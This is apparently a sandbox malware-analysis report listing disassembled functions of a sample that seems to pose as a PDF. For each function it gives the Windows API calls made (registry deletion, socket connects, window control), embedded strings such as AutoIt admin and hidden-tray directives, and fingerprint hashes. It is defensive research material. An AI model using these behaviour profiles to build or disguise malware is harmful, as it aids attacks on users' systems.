                                                            Function 0017122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0017125C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00171286
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0017133D
                                                              • Part of subcall function 0017122D: RegCloseKey.ADVAPI32(?), ref: 001712A3
                                                              • Part of subcall function 0017122D: FreeLibrary.KERNEL32(?), ref: 001712F5
                                                              • Part of subcall function 0017122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00171318
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 001712E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
                                                            • Instruction ID: 191a75863c081a074a5eaa609148ded887dd8d4188662ccffbe1d9393368dd74
                                                            • Opcode Fuzzy Hash: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
                                                            • Instruction Fuzzy Hash: 37314BB1901109BFDB14DB94DC89AFFB7BCFF08350F104169F509E2641EB749E859AA0
                                                            Function 0017653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0017655B
                                                            • GetWindowLongW.USER32(00E95A00,000000F0), ref: 0017658E
                                                            • GetWindowLongW.USER32(00E95A00,000000F0), ref: 001765C3
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001765F5
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0017661F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00176630
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0017664A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
                                                            • Instruction ID: 491c3e9a1ec298d776043797cca27a37840b7b184c9bb14003fdf8b794c22291
                                                            • Opcode Fuzzy Hash: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
                                                            • Instruction Fuzzy Hash: B8312431644610AFDB21CF28DC84F553BF1FB5A750F2982A8F5098B6B6CB71AC81EB51
                                                            Function 00166486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001664D9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001664E8
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166521
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 0016652A
                                                            • WSAGetLastError.WSOCK32 ref: 00166534
                                                            • closesocket.WSOCK32(00000000), ref: 0016655D
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166576
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
                                                            • Instruction ID: 8437455de1f848cf38ca93a37da46d2814461a800b4868c60fec5f8a5efe9a43
                                                            • Opcode Fuzzy Hash: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
                                                            • Instruction Fuzzy Hash: BD31AF31600218AFDB10AF24DC85BBE7BBCEB45754F048029F90AD7291CB70AD95CBA2
                                                            Function 0014E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0014E123
                                                            • SysAllocString.OLEAUT32 ref: 0014E144
                                                            • SysFreeString.OLEAUT32 ref: 0014E14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0014E167
                                                            • SysAllocString.OLEAUT32(?), ref: 0014E175
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 24069f4106e2591dfa265f60ad94873b04b4f0de0dcadaeb3b860addbd0c20e2
                                                            • Instruction ID: d74dea28847b1305dc477c4ef719b48fa3c3373e5fddf8727b518063c01e3e73
                                                            • Opcode Fuzzy Hash: 24069f4106e2591dfa265f60ad94873b04b4f0de0dcadaeb3b860addbd0c20e2
                                                            • Instruction Fuzzy Hash: F1214135644108AF9B149FA8DC89DAB77ECFB09B60B508139F919CB270DB70DC828B64
                                                            Function 0014FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 3ab1a5cf8bbd3581a22d60b4a989e3ded0c8740f785b3b45b1a0b7795fa52667
                                                            • Instruction ID: a9db13f39bd6972148a6f36e7af1ed925ace8b4239353ee776638f9a312a5dcf
                                                            • Opcode Fuzzy Hash: 3ab1a5cf8bbd3581a22d60b4a989e3ded0c8740f785b3b45b1a0b7795fa52667
                                                            • Instruction Fuzzy Hash: B9216732104214A6D239A624ED52EE7B398EF66300F10443DF985872A1EB60AE83D391
                                                            Function 0017783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001778A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001778AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001778B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001778C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001778D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
                                                            • Instruction ID: a1e6a19de1c655cf6c89fef1042c3070e64739173ab3d20f5268fadb1268035c
                                                            • Opcode Fuzzy Hash: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
                                                            • Instruction Fuzzy Hash: 301190B2154219BFEF159F60CC85EE77F6DEF08758F018114BA08A2090CB729C61DBA0
                                                            Function 001141C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00114292,?), ref: 001141E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001141EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 001141F6
                                                            • DecodePointer.KERNEL32(00000001,00114292,?), ref: 00114213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
                                                            • Instruction ID: a2ef5f2634d650bc005ddc572c367c93488d3c4d1bb4136183f984c92e2b3ef4
                                                            • Opcode Fuzzy Hash: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
                                                            • Instruction Fuzzy Hash: E5E01AB4A90300AFEF207FB8EC09B453AE5BB20B02F508638F555D58A1DBB560D6CF00
                                                            Function 0011429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001141B8), ref: 001142B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001142BF
                                                            • EncodePointer.KERNEL32(00000000), ref: 001142CA
                                                            • DecodePointer.KERNEL32(001141B8), ref: 001142E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
                                                            • Instruction ID: 49b3f410f6ab054de0143c7674f421a502135dd4e4784677d92642ed14d6e14f
                                                            • Opcode Fuzzy Hash: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
                                                            • Instruction Fuzzy Hash: BEE0BF7C9813109BEB209B64FC0DF453AB4F714B42F108228F105E19A1CB7455C5CB14
                                                            Function 0015675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                                                            • Instruction ID: 1a185bcdb39c1444ef95666478604f0daa1e10f05ae4e6ff8a66dc07a64b4057
                                                            • Opcode Fuzzy Hash: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                                                            • Instruction Fuzzy Hash: 5E61CD3090424AEBCF15EF64CC82FFE77A4AF08308F454419FE695B292DB30A849DB91
                                                            Function 0017046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00170588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001705AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001705D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00170617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170624
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 2081cffac07448c8523d2d3061f5d2d659fdfca4bf570d0dd5262734fd9c5dc1
                                                            • Instruction ID: 257e4691509b0785eef6c8d7d289fedc359225c0c3f265a2acacbf6847694bb5
                                                            • Opcode Fuzzy Hash: 2081cffac07448c8523d2d3061f5d2d659fdfca4bf570d0dd5262734fd9c5dc1
                                                            • Instruction Fuzzy Hash: DD513631508304AFC715EB24C885EAFBBB9FF88314F04892DF649872A2DB31E945DB52
                                                            Function 00175A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00175A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00175AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00175AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00175B50
                                                            • GetSubMenu.USER32(?,?), ref: 00175B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00175BAF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 7748b9f84cabdc1cb5576ac8ff06b702ed85c7876c8e899fe5b6ec308229b559
                                                            • Instruction ID: b71ec5a52b7498a5fd734d5fc76dc8aae7abcefa8a91dfc1f2e8c86208848b74
                                                            • Opcode Fuzzy Hash: 7748b9f84cabdc1cb5576ac8ff06b702ed85c7876c8e899fe5b6ec308229b559
                                                            • Instruction Fuzzy Hash: 2B518F35A00619EFCB15DF64C845AEEB7B6EF48310F108469F919BB351CBB0AE81CB90
                                                            Function 0014F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0014F3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 0014F469
                                                            • VariantClear.OLEAUT32(00000000), ref: 0014F4C4
                                                            • _memmove.LIBCMT ref: 0014F4EE
                                                            • VariantClear.OLEAUT32(?), ref: 0014F53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0014F569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
                                                            • Instruction ID: b0f9bcfa93efc5452ef4a72f376ac4c28d3a533f7f66bd5578f986b8f63d7675
                                                            • Opcode Fuzzy Hash: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
                                                            • Instruction Fuzzy Hash: 1E5136B5A00209AFCB14CF58D884AAAB7B8FF4C354F15856EE959DB311D730E952CBA0
                                                            Function 001526F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152792
                                                            • IsMenu.USER32(00000000), ref: 001527B2
                                                            • CreatePopupMenu.USER32 ref: 001527E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00152844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00152875
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
                                                            • Instruction ID: 72f09d829d56f04e46662b9df9557df7edeca6c93d3e6704cc532e05f5a838ef
                                                            • Opcode Fuzzy Hash: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
                                                            • Instruction Fuzzy Hash: A351C072A00309DFDF24CFA8D888AAEBBF5AF56315F104169EC359F290D7709948CB51
                                                            Function 000F1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 000F179A
                                                            • GetWindowRect.USER32(?,?), ref: 000F17FE
                                                            • ScreenToClient.USER32(?,?), ref: 000F181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000F182C
                                                            • EndPaint.USER32(?,?), ref: 000F1876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
                                                            • Instruction ID: 9932bc396478b773977a1e7c2d38a2165bd76622f9ada49fc3faa244c359c419
                                                            • Opcode Fuzzy Hash: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
                                                            • Instruction Fuzzy Hash: B641AE71104304EFD710DF24DC84BBA7BF8EB59724F140628FA98875A2CB359C86EB61
                                                            Function 0017B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(001B67B0,00000000,00E95A00,?,?,001B67B0,?,0017B862,?,?), ref: 0017B9CC
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0017B9F0
                                                            • ShowWindow.USER32(001B67B0,00000000,00E95A00,?,?,001B67B0,?,0017B862,?,?), ref: 0017BA50
                                                            • ShowWindow.USER32(00000000,00000004,?,0017B862,?,?), ref: 0017BA62
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0017BA86
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0017BAA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
